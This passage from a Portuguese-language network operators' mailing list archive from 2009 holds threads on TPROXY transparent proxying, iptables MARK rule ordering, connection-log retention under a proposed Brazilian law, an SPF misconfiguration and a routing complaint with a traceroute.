<1372033686-1246274670-cardhu_decombobulator_blackberry.rim.net-549337917-@bxe1207.bisx.prod.on.blackberry> Message-ID: <61523.189.71.10.122.1246300014.squirrel@anid.com.br> > Eu saio pela CTBC e tenho reclama??es tamb?m... Downloads do mirrors.uol > oscilam bastante, por exemplo. > Renato Ornelas mas um traceroute ou mtr apresenta perda de pacotes ANTES da chegada ao border do UOL? !3runo From renato.ornelas at gmail.com Mon Jun 29 22:24:22 2009 From: renato.ornelas at gmail.com (Renato Ornelas) Date: Mon, 29 Jun 2009 22:24:22 -0300 Subject: [GTER] Problemas com Tproxy In-Reply-To: <9307FA2E375143A89EAA9EBF8B8C5269@admgaz.com.br> References: <4A48D46B.4050107@conectcor.com.br> <9307FA2E375143A89EAA9EBF8B8C5269@admgaz.com.br> Message-ID: Ol? Welisson, Acredito que se voc? nao estiver usando WCCP ou algo semelhante, e usar o TPROXY, os pacotes v?o sair com o IP do cliente, s? que quando voltar pelo seu router, ele vai entregar direto para os clientes e n?o devolver para o proxy. De qualquer forma, os pacotes de retorno tem que ser interceptados e jogados para o proxy tamb?m! Quem sabe um regra no router com --sport 80 n?o d? certo? Renato Ornelas 2009/6/29 Eduardo Schoedler > Ol? Welisson. > > O tproxy n?o possui muita documenta??o. > Existe uma lista de discuss?o: > https://lists.balabit.hu/mailman/listinfo/tproxy > > Abra?o, > Eduardo. > > > ----- Original Message ----- From: "Welisson" > To: > Sent: Monday, June 29, 2009 11:49 AM > Subject: [GTER] Problemas com Tproxy > > > > Bom dia a todos > > > Galera gostaria de um auxilio de voc?s, na seguinte situa??o. > Tenho um server rodando com proxy squid em modo transparente, por?m o > que ocorre ? o seguinte, preciso fazer com que as solicita??es com > destino a porta 80 seja redirecionada para esse servidor proxy cujo o > qual est? habilitado o tproxy, e em perfeito funcionamento quando essa > maquina passa ser o gateway da rede... > Criei um ambiente testes com as seguintes caracteristicas, maquina 1 > Debian 5 Etch kernel 2.6.19 (recompilado), fazendo o redirecionamento da > seguinte maneira abaixo > iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j > TPROXY --on-ip 189.4xx.xxx.10 --on-port 3128 > > Ele redireciona normalmente, por?m ocorre o seguinte erro abaixo > > 2009/06/29 11:38:09| tproxy ip=189.1xx.xxx.2,0x2a07fbd,port=0 ERROR ASSIGN > > Pensando que poderia ser algum problema de patch, coloquei tal maquina > como gw e o tproxy funcionou perfeitamente. > > No entanto na maquina 1 fiz simplesmente uma regra de DNAT > redirecionando as solicita??es com destino a porta 80 para a maquina 2 > (Debina 5 Etch, kernel 2.6.19, CacheBoy 1.5.2, tentei com o squid tamb?m > e ocorre o mesmo problema) > Exemplo digitado na maquina 1 > iptables -t nat -A PREROUTING -s 189.1xx.xxx.xx2 -p TCP --dport 80 -j > DNAT --to-destination 189.4xx.xxx.10 > > Maquina 2 > iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j > TPROXY --on-port 3128 > > Nessa situa??o n?o a navega??o, pois as solicita??es d?o timeout no squid. > > Situa??o descrita abaixo > > > Esta??o 1 <------> Gateway<------>Internet > | Todas as solicita??es da esta??o 1 com destino a > | porta 80 ? redirecionada para o proxy. > Proxy > > > Agrade?o desde j?. > > -- > Welisson > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From ce.langoni at gmail.com Tue Jun 30 09:57:36 2009 From: ce.langoni at gmail.com (Carlos Eduardo Langoni) Date: Tue, 30 Jun 2009 09:57:36 -0300 Subject: [GTER] Cuidados com o Alvo(Target) Mark no iptables Message-ID: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> Demorei 3 dias para entender este problema e encontrar a solu??o para ele, e acho que pode ser ?til para outras pessoas, a medida que aumenta-se a oferta e disponibilidade de servi?os de acesso a internet. Como todos sabem ? simples e eficiente fazer balanceamento de carga entre dois links de internet com Linux. Isso ? feito utilizando o Alvo(Target) MARK do iptables em conjunto com algumas regras do iproute2[1]. O problema aparece quando come?amos a trabalhar com v?rios alvos MARK. No meu caso espec?fico encontrei este problema quando comecei a utilizar o NoCat como autenticador da rede, ele identifica o pacote j? autenticado atrav?s de marcas relacionadas a pacotes, 0x4 para n?o autenticados e 0x3,0x2 e 0x1 para os autenticados, dependendo do grupo ele escolhe entre as marcas 3,2 e 1. Quando eu precisei fazer com que determinados pacotes saissem por uma segunda conex?o com a internet os problemas come?aram. De forma alguma eu consegui fazer funcionar. Eu removia todas as regras subia apenas as regras necess?rias ao roteamento e funcionava, quando misturava com as regras nada de funcionar. Ap?s ler muitos logs e fazer muitos testes comecei a entender o funcionamento. No geral quando um pacote casa com uma regra o iptables para o processamento na chain e passa para a pr?xima chain (ou para o envio do pacote quando chega na ?ltima chain). Mas no caso do alvo MARK, como o pacote n?o foi aceitado nem rejeitado, o processamento n?o para, ele simplesmente associa o pacote ? marca e segue para pr?xima regra. Se houver alguma outra regra de MARK conflitante, que tamb?m case com o pacote, a marca do pacote ser? alterada. Exemplo: iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 -j MARK --set-mark 1 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 Neste caso todos os pacotes com origem em 192.168.0.0/24 ser?o marcados com 2 no final do processamento Se a ?ltima regra desta chain fosse: iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 Todos os pacotes seriam marcados com 5. Desta forma ? preciso muita aten??o para criar regras de marca??o de pacotes, a fim de evitar que a marca n?o seja aplicada corretamente. No caso do exemplo a melhor ordem para as regras seria: iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 -j MARK --set-mark 1 Desta forma todos os pacotes com origem em 192.168.0.0/24 com destino a 200.xxx.xxx.0/24 recebem marca 1, com origem 192.168.0.0/24 e qualquer destino recebem marca 2 e os demais pacotes marca 5 Espero que seja ?til para mais algu?m esta informa??o Abra?os a todos! [1] http://lartc.org/ From alexandre at onda.psi.br Tue Jun 30 10:10:47 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Tue, 30 Jun 2009 10:10:47 -0300 Subject: [GTER] Cuidados com o Alvo(Target) Mark no iptables In-Reply-To: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> Message-ID: <4A4A0ED7.7090701@onda.psi.br> depois do mark voce precisa dar um ACCEPT para que nao siga o processamento... MARK trabalha igual o RETURN (apenas nao marca) Carlos Eduardo Langoni wrote: > Demorei 3 dias para entender este problema e encontrar a solu??o para > ele, e acho que pode ser ?til para outras pessoas, a medida que > aumenta-se a oferta e disponibilidade de servi?os de acesso a > internet. > > Como todos sabem ? simples e eficiente fazer balanceamento de carga > entre dois links de internet com Linux. > Isso ? feito utilizando o Alvo(Target) MARK do iptables em conjunto > com algumas regras do iproute2[1]. > > O problema aparece quando come?amos a trabalhar com v?rios alvos MARK. > No meu caso espec?fico encontrei este problema quando comecei a > utilizar o NoCat como autenticador da rede, ele identifica o pacote j? > autenticado atrav?s de marcas relacionadas a pacotes, 0x4 para n?o > autenticados e 0x3,0x2 e 0x1 para os autenticados, dependendo do grupo > ele escolhe entre as marcas 3,2 e 1. > Quando eu precisei fazer com que determinados pacotes saissem por uma > segunda conex?o com a internet os problemas come?aram. De forma alguma > eu consegui fazer funcionar. Eu removia todas as regras subia apenas > as regras necess?rias ao roteamento e funcionava, quando misturava com > as regras nada de funcionar. > > Ap?s ler muitos logs e fazer muitos testes comecei a entender o funcionamento. > No geral quando um pacote casa com uma regra o iptables para o > processamento na chain e passa para a pr?xima chain (ou para o envio > do pacote quando chega na ?ltima chain). Mas no caso do alvo MARK, > como o pacote n?o foi aceitado nem rejeitado, o processamento n?o > para, ele simplesmente associa o pacote ? marca e segue para pr?xima > regra. Se houver alguma outra regra de MARK conflitante, que tamb?m > case com o pacote, a marca do pacote ser? alterada. > > Exemplo: > iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 > -j MARK --set-mark 1 > iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 > Neste caso todos os pacotes com origem em 192.168.0.0/24 ser?o > marcados com 2 no final do processamento > Se a ?ltima regra desta chain fosse: > iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 > Todos os pacotes seriam marcados com 5. > > Desta forma ? preciso muita aten??o para criar regras de marca??o de > pacotes, a fim de evitar que a marca n?o seja aplicada corretamente. > No caso do exemplo a melhor ordem para as regras seria: > iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 > iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 > iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 > -j MARK --set-mark 1 > > Desta forma todos os pacotes com origem em 192.168.0.0/24 com destino > a 200.xxx.xxx.0/24 recebem marca 1, com origem 192.168.0.0/24 e > qualquer destino recebem marca 2 e os demais pacotes marca 5 > > Espero que seja ?til para mais algu?m esta informa??o > > Abra?os a todos! > [1] http://lartc.org/ > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From edinilson at atinet.com.br Tue Jun 30 11:31:14 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Tue, 30 Jun 2009 11:31:14 -0300 Subject: [GTER] Log das conexoes References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> Message-ID: <26A410474C334BCA9B62462933F841AF@atinet.com.br> Caros amigos, como ? praticamente certeza que a Lei Azeredo ira passar, como voces estao pretendendo gerar e armazenar os logs das conexoes dos usuarios? Obrigado Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br From frederick at dahype.org Tue Jun 30 12:01:21 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 30 Jun 2009 11:01:21 -0400 Subject: [GTER] RES: Log das conexoes In-Reply-To: <26A410474C334BCA9B62462933F841AF@atinet.com.br> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> <26A410474C334BCA9B62462933F841AF@atinet.com.br> Message-ID: Atribuir ip valido a todos e salvar os logs do radius ou DHCP durante o tempo previsto ? um come?o. O restante ainda n?o obtive aconselhamento jur?dico detalhado o suficiente para saber at? onde salvar. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Edinilson - ATINET > Enviada em: ter?a-feira, 30 de junho de 2009 11:31 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] Log das conexoes > Prioridade: Alta > > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira passar, > como > voces estao pretendendo gerar e armazenar os logs das conexoes dos > usuarios? > > Obrigado > > Edinilson > --------------------------------------------------------- > ATINET-Professional Web Hosting > Tel Voz: (0xx11) 4412-0876 > http://www.atinet.com.br > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From lscrlstld at gmail.com Tue Jun 30 12:51:25 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Tue, 30 Jun 2009 12:51:25 -0300 Subject: [GTER] RES: RES: Log das conexoes In-Reply-To: References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br><26A410474C334BCA9B62462933F841AF@atinet.com.br> Message-ID: <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> Desde 1994 existe uma lei nos USA chamada CALEA (Communications Assistance for Law Enforcement Act), que em um trecho diz "to make clear a telecommunications carrier's duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes." Assim existe uma solu??o tamb?m chamada CALEA utilizada nos USA, que permite o armazenamento de certos logs de tr?fego. Creio que haver? a necessidade de algo do g?nero "CALEA" para atendimento da Lei Azeredo. Deixando claro que n?o estou fazendo nenhuma compara??o entre leis, nem dizendo que o CALEA atenda essa necessidade. Abs Toledo > > Atribuir ip valido a todos e salvar os logs do radius ou DHCP > durante o tempo previsto ? um come?o. O restante ainda n?o > obtive aconselhamento jur?dico detalhado o suficiente para > saber at? onde salvar. > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br > [mailto:gter-bounces at eng.registro.br] > > Em nome de Edinilson - ATINET > > Enviada em: ter?a-feira, 30 de junho de 2009 11:31 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: [GTER] Log das conexoes > > Prioridade: Alta > > > > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira > > passar, como voces estao pretendendo gerar e armazenar os logs das > > conexoes dos usuarios? > > > > Obrigado > > > > Edinilson > > --------------------------------------------------------- > > ATINET-Professional Web Hosting > > Tel Voz: (0xx11) 4412-0876 > > http://www.atinet.com.br > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter From welisson at conectcor.com.br Tue Jun 30 14:06:13 2009 From: welisson at conectcor.com.br (Welisson) Date: Tue, 30 Jun 2009 14:06:13 -0300 Subject: [GTER] Problemas com Tproxy In-Reply-To: <4A4A2839.3060203@corp.visaonet.com.br> References: <4A490386.2090703@corp.visaonet.com.br> <4A491F2C.20101@conectcor.com.br> <4A4A2839.3060203@corp.visaonet.com.br> Message-ID: <4A4A4605.1000102@conectcor.com.br> Agrade?o a aten??o de todos, em especial ao Rodrigo Martins e Renato Ornelas. A solu??o do meu Problema foi realmente a regra de volta que eu n?o estava colocando --sport postado na lista pelo Renato, onde o nosso colega Rodrigo tamb?m me fez um coment?rio sobre roteamento avan?ado, onde j? eu havia feito in?meros testes com ele, mas n?o me atentava a volta do pacote, fazendo com que ele somente fosse enviado na request do usu?rio para o servidor proxy. Obrigado a todos novamente. Att. -- Welisson From algorges at gmail.com Tue Jun 30 16:05:45 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Tue, 30 Jun 2009 16:05:45 -0300 Subject: [GTER] SPF e BOL Message-ID: Algu?m respons?vel pelo BOL, pode verificar o registro SPF? Meu servidor tem recebido emails por alguns servidores relay[1-9].bol.com.br Mas o registro SPF do proprio BOL n?o autoriza essas m?quinas. Um exemplo: Jun 30 16:01:22 mx postfix/smtpd[11194]: NOQUEUE: reject: RCPT from relay7.bol.com.br[187.17.116.4]: 550 5.7.1 : Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom&id=cliente%40bol.com.br&ip=187.17.116.4&r =mx.netuno.com.br; from= to= proto=ESMTP helo= Consultando o SPF. As classes autorizadas s?o: bol.com.br. 634 IN TXT "v=spf1 ip4:200.221.11.0/24 ip4:200.221.29.0/24 ip4:200.221.4.0/24 ip4:200.221.24.0/24 -all" []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com From patrick at vol.net.br Tue Jun 30 10:18:21 2009 From: patrick at vol.net.br (Patrick Barreto Petronetto) Date: Tue, 30 Jun 2009 10:18:21 -0300 Subject: [GTER] RES: Cuidados com o Alvo(Target) Mark no iptables In-Reply-To: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> Message-ID: Rapaz, eu tamb?m quebrei a cabe?a um tempo por causa disso. Justamente pq pensava que uma vez marcado o pacote n?o percorria mais as regras de Mark tamb?m. S? fui descobrir isso depois que rodei um sniffer depois do firewall e vi que a marca??o estava diferente da que "deveria ser". hehehhee ? legal alertar o pessoal, acho que nem todo mundo sabe desse "detalhe" do iptables. Att, Patrick Barreto Petronetto patrick at vol.net.br http://www.vol.net.br ? Antes de imprimir, pense em sua responsabilidade e compromisso com o MEIO AMBIENTE. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Carlos Eduardo Langoni Enviada em: ter?a-feira, 30 de junho de 2009 09:58 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] Cuidados com o Alvo(Target) Mark no iptables Demorei 3 dias para entender este problema e encontrar a solu??o para ele, e acho que pode ser ?til para outras pessoas, a medida que aumenta-se a oferta e disponibilidade de servi?os de acesso a internet. Como todos sabem ? simples e eficiente fazer balanceamento de carga entre dois links de internet com Linux. Isso ? feito utilizando o Alvo(Target) MARK do iptables em conjunto com algumas regras do iproute2[1]. O problema aparece quando come?amos a trabalhar com v?rios alvos MARK. No meu caso espec?fico encontrei este problema quando comecei a utilizar o NoCat como autenticador da rede, ele identifica o pacote j? autenticado atrav?s de marcas relacionadas a pacotes, 0x4 para n?o autenticados e 0x3,0x2 e 0x1 para os autenticados, dependendo do grupo ele escolhe entre as marcas 3,2 e 1. Quando eu precisei fazer com que determinados pacotes saissem por uma segunda conex?o com a internet os problemas come?aram. De forma alguma eu consegui fazer funcionar. Eu removia todas as regras subia apenas as regras necess?rias ao roteamento e funcionava, quando misturava com as regras nada de funcionar. Ap?s ler muitos logs e fazer muitos testes comecei a entender o funcionamento. No geral quando um pacote casa com uma regra o iptables para o processamento na chain e passa para a pr?xima chain (ou para o envio do pacote quando chega na ?ltima chain). Mas no caso do alvo MARK, como o pacote n?o foi aceitado nem rejeitado, o processamento n?o para, ele simplesmente associa o pacote ? marca e segue para pr?xima regra. Se houver alguma outra regra de MARK conflitante, que tamb?m case com o pacote, a marca do pacote ser? alterada. Exemplo: iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 -j MARK --set-mark 1 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 Neste caso todos os pacotes com origem em 192.168.0.0/24 ser?o marcados com 2 no final do processamento Se a ?ltima regra desta chain fosse: iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 Todos os pacotes seriam marcados com 5. Desta forma ? preciso muita aten??o para criar regras de marca??o de pacotes, a fim de evitar que a marca n?o seja aplicada corretamente. No caso do exemplo a melhor ordem para as regras seria: iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK --set-mark 2 iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 -j MARK --set-mark 1 Desta forma todos os pacotes com origem em 192.168.0.0/24 com destino a 200.xxx.xxx.0/24 recebem marca 1, com origem 192.168.0.0/24 e qualquer destino recebem marca 2 e os demais pacotes marca 5 Espero que seja ?til para mais algu?m esta informa??o Abra?os a todos! [1] http://lartc.org/ -- gter list https://eng.registro.br/mailman/listinfo/gter From ce.langoni at gmail.com Tue Jun 30 10:13:41 2009 From: ce.langoni at gmail.com (Carlos Eduardo Langoni) Date: Tue, 30 Jun 2009 10:13:41 -0300 Subject: [GTER] Cuidados com o Alvo(Target) Mark no iptables In-Reply-To: <4A4A0ED7.7090701@onda.psi.br> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> Message-ID: <8aa07a210906300613v1b6ccb67td1bd97a44674e70c@mail.gmail.com> Alexandre, Depois do Mark voc? precisa dar um Accept se a Default Policy for DROP, mas nunca utilizei nada na tabela mangle como Default Policy em DROP e nunca vi em uso tamb?m. Abra?os! 2009/6/30 Alexandre J. Correa - Onda Internet : > depois do mark voce precisa dar um ACCEPT para que nao siga o > processamento... > > MARK trabalha igual o RETURN (apenas nao marca) > > > Carlos Eduardo Langoni wrote: >> >> Demorei 3 dias para entender este problema e encontrar a solu??o para >> ele, e acho que pode ser ?til para outras pessoas, a medida que >> aumenta-se a oferta e disponibilidade de servi?os de acesso a >> internet. >> >> Como todos sabem ? simples e eficiente fazer balanceamento de carga >> entre dois links de internet com Linux. >> Isso ? feito utilizando o Alvo(Target) MARK do iptables em conjunto >> com algumas regras do iproute2[1]. >> >> O problema aparece quando come?amos a trabalhar com v?rios alvos MARK. >> No meu caso espec?fico encontrei este problema quando comecei a >> utilizar o NoCat como autenticador da rede, ele identifica o pacote j? >> autenticado atrav?s de marcas relacionadas a pacotes, 0x4 para n?o >> autenticados e 0x3,0x2 e 0x1 para os autenticados, dependendo do grupo >> ele escolhe entre as marcas 3,2 e 1. >> Quando eu precisei fazer com que determinados pacotes saissem por uma >> segunda conex?o com a internet os problemas come?aram. De forma alguma >> eu consegui fazer funcionar. Eu removia todas as regras subia apenas >> as regras necess?rias ao roteamento e funcionava, quando misturava com >> as regras nada de funcionar. >> >> Ap?s ler muitos logs e fazer muitos testes comecei a entender o >> funcionamento. >> No geral quando um pacote casa com uma regra o iptables para o >> processamento na chain e passa para a pr?xima chain (ou para o envio >> do pacote quando chega na ?ltima chain). Mas no caso do alvo MARK, >> como o pacote n?o foi aceitado nem rejeitado, o processamento n?o >> para, ele simplesmente associa o pacote ? marca e segue para pr?xima >> regra. Se houver alguma outra regra de MARK conflitante, que tamb?m >> case com o pacote, a marca do pacote ser? alterada. >> >> Exemplo: >> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 >> -j MARK --set-mark 1 >> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK >> --set-mark 2 >> Neste caso todos os pacotes com origem em 192.168.0.0/24 ser?o >> marcados com 2 no final do processamento >> Se a ?ltima regra desta chain fosse: >> iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 >> Todos os pacotes seriam marcados com 5. >> >> Desta forma ? preciso muita aten??o para criar regras de marca??o de >> pacotes, a fim de evitar que a marca n?o seja aplicada corretamente. >> No caso do exemplo a melhor ordem para as regras seria: >> iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 >> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK >> --set-mark 2 >> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 >> -j MARK --set-mark 1 >> >> Desta forma todos os pacotes com origem em 192.168.0.0/24 com destino >> a 200.xxx.xxx.0/24 recebem marca 1, com origem 192.168.0.0/24 e >> qualquer destino recebem marca 2 e os demais pacotes marca 5 >> >> Espero que seja ?til para mais algu?m esta informa??o >> >> Abra?os a todos! >> [1] http://lartc.org/ >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> > > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From itamar at ispbrasil.com.br Tue Jun 30 11:33:18 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Tue, 30 Jun 2009 11:33:18 -0300 Subject: [GTER] Log das conexoes In-Reply-To: <26A410474C334BCA9B62462933F841AF@atinet.com.br> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> <26A410474C334BCA9B62462933F841AF@atinet.com.br> Message-ID: quem disse que a lei do Azeredo vai passar ? at? o Lula se manifestou contra no ultimo FISL. 2009/6/30 Edinilson - ATINET : > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira passar, como > voces estao pretendendo gerar e armazenar os logs das conexoes dos usuarios? > > Obrigado > > Edinilson > --------------------------------------------------------- > ATINET-Professional Web Hosting > Tel Voz: (0xx11) 4412-0876 > http://www.atinet.com.br > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From tcosta at mdsystems.com.br Tue Jun 30 11:36:15 2009 From: tcosta at mdsystems.com.br (Tiago Machado Costa) Date: Tue, 30 Jun 2009 11:36:15 -0300 Subject: [GTER] Log das conexoes In-Reply-To: <26A410474C334BCA9B62462933F841AF@atinet.com.br> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br> <26A410474C334BCA9B62462933F841AF@atinet.com.br> Message-ID: <220CAFD00976BD45BA31609CB04BE26D576695@mdssbs01.mdsystems.local> Empresa pequena e media n?o vai ter problema com isto. O Projeto ? ridiculo, mas se for aprovado, vamos ver o que acontece n?... A maioria dos logs s?o tudo txt, isto compactado fica tranquilo. []s Tiago PS - o Azeredo ? meio doido n? :) -----Original Message----- From: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] On Behalf Of Edinilson - ATINET Sent: Tuesday, June 30, 2009 11:31 AM To: Grupo de Trabalho de Engenharia e Operacao de Redes Subject: [GTER] Log das conexoes Importance: High Caros amigos, como ? praticamente certeza que a Lei Azeredo ira passar, como voces estao pretendendo gerar e armazenar os logs das conexoes dos usuarios? Obrigado Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br -- gter list https://eng.registro.br/mailman/listinfo/gter From guilherme at maxihost.com.br Tue Jun 30 12:16:44 2009 From: guilherme at maxihost.com.br (Guilherme Alberto) Date: Tue, 30 Jun 2009 12:16:44 -0300 Subject: [GTER] Problemas com Telemar Message-ID: <9E656FCAA5CE4DD4BD7A9C4C5DAD08E5@host> Pessoal, N?s somos um ASN e estamos dentro do Datacenter da Intelig na Lapa, utilizando uma fibra do UOL que parte da Bar?o de Limeira (onde eles possuem troca de tr?fego com v?rias outras operadoras). H? mais ou menos 20 dias come?amos a enfrentar um problema que est? nos impactando bastante. Come?amos a enfrentar problemas com usu?rios que utilizam banda larga da Velox, ou que utilizam rotas pela Telemar. Aparentemente as rotas a partir da Telemar chegam a alguns destinos atrav?s de rota internacional e para outros destinos, aparentemente possuem prioridade e chegam atrav?s de alguma fibra nacional. Tentamos entrar em contato com eles, mas informam que eles atendem apenas clientes. N?s estamos solicitando aos nossos usu?rios que enfrentam o problema, que entrem em contato com a Telemar para reclamar, mas sinto que n?o est? sendo suficiente. Pergunto para voc?s, quem ? a responsabilidade em resolver este problema ? Algu?m pode me dar uma luz ? Algu?m tem algum contato na Telemar/OI que pode me ajudar a resolver este problema ? Segue abaixo um tracert partindo de um de nossos usu?rios, Rastreando a rota para 189.1.164.47 com no m?ximo 30 saltos 1 25 ms 15 ms 15 ms 200217089024.user.veloxzone.com.br [200.217.89.24] 2 15 ms 15 ms 15 ms gigabitethernet5-2.81-cto-pi-rotd-03.telemar.net.br [200.217.30.62] 3 1546 ms 30 ms 31ms 200.223.254.93 4 62 ms 31 ms 31 ms gi14-0-0.3-cen-ce-rotd-02.telemar.net.br [200.164.188.195] 5 109 ms 109 ms 109 ms Fa0-1-0.ARC-RJ-ROTB-01.telemar.net.br [200.223.131.146] 6 124 ms 124 ms 109 ms Ge3-2-0-0-grtnycpt3.red.telefonica-wholesale.net[84.16.11.241] 7 156 ms 109 ms 109 ms XE1-0-2-0-grtnycpt2.red.telefonica-wholesale.net[213.140.38.129] 8 3390 ms 171 ms 155 ms xe11-2-0-0-grtmiabr5.telefonica-wholesale.net [84.16.15.126] 9 265 ms 155 ms 265 ms Xe0-3-0-0-grtsanem2.red.telefonica-wholesale.net[84.16.15.33] 10 186 ms 187 ms 187 ms TEBRASIL-2-2-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-addr.arpa [84.16.10.14] 11 186 ms 186 ms 187 ms 201-63-253-166.customer.tdatabrasil.net.br [201.63.253.166] 12 186 ms 186 ms 187 ms 201-63-54-194.customer.tdatabrasil.net.br [201.63.54.194] 13 187 ms 187 ms 437 ms 201-63-54-194.customer.tdatabrasil.net.br [201.63.54.194] 14 187 ms 187 ms 186 ms int1.idcsp.com.br [200.192.129.129] 15 * 187ms * int1.idcsp.com.br [200.192.129.129] 16 * * * Esgotado o tempo limite do pedido. 17 170 ms 187 ms 187 ms 189.1.164.47 Rastreamento conclu?do. From cleber-listas at inetweb.com.br Tue Jun 30 13:29:26 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Tue, 30 Jun 2009 13:29:26 -0300 Subject: [GTER] RES: RES: RES: Log das conexoes In-Reply-To: <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br><26A410474C334BCA9B62462933F841AF@atinet.com.br> <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> Message-ID: N?o li ainda a lei por completo, por?m, provavelmente iremos habilitar um syslogd para armazenamento das informa??es em outro servidor. Estamos inclusive, calculando os investimentos e provavelmente repassar a conta ao usu?rio final. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Toledo, Luis Carlos Enviada em: ter?a-feira, 30 de junho de 2009 12:51 Para: 'Grupo de Trabalho de Engenharia e Operacao de Redes' Assunto: [GTER] RES: RES: Log das conexoes Desde 1994 existe uma lei nos USA chamada CALEA (Communications Assistance for Law Enforcement Act), que em um trecho diz "to make clear a telecommunications carrier's duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes." Assim existe uma solu??o tamb?m chamada CALEA 